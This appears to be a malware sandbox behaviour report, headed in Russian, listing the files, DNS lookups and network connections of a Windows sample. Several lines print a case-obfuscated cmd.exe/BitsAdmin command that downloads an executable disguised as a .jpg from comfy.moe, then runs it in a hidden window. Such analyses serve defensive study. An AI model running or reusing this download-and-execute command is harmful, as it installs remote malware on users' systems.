Техническая информация
- '<SYSTEM32>\cmd.exe' /C BitsAdMin /tRanSfEr rrjlvitxVZsxBnETUghVOJJdCNgi /PRioRIty fOreGround https://comfy.moe/wnovfs.jpg %USERPROFILE%\zIdFcBjwShm.exe && sTart %USERPROFILE%\zIdFcBjwShm.exe
- %WINDIR%\temp\cab15f1.tmp
- %WINDIR%\temp\tar15f2.tmp
- %WINDIR%\temp\cab2c7f.tmp
- %WINDIR%\temp\tar2c80.tmp
- %WINDIR%\temp\cab15f1.tmp
- %WINDIR%\temp\tar15f2.tmp
- %WINDIR%\temp\cab2c7f.tmp
- %WINDIR%\temp\tar2c80.tmp
- 'co##y.moe':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'co##y.moe':443
- DNS ASK co##y.moe
- DNS ASK pk#.goog
- '<SYSTEM32>\cmd.exe' /C BitsAdMin /tRanSfEr rrjlvitxVZsxBnETUghVOJJdCNgi /PRioRIty fOreGround https://comfy.moe/wnovfs.jpg %USERPROFILE%\zIdFcBjwShm.exe && sTart %USERPROFILE%\zIdFcBjwShm.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /tRanSfEr rrjlvitxVZsxBnETUghVOJJdCNgi /PRioRIty fOreGround https://comfy.moe/wnovfs.jpg %HOMEPATH%\zIdFcBjwShm.exe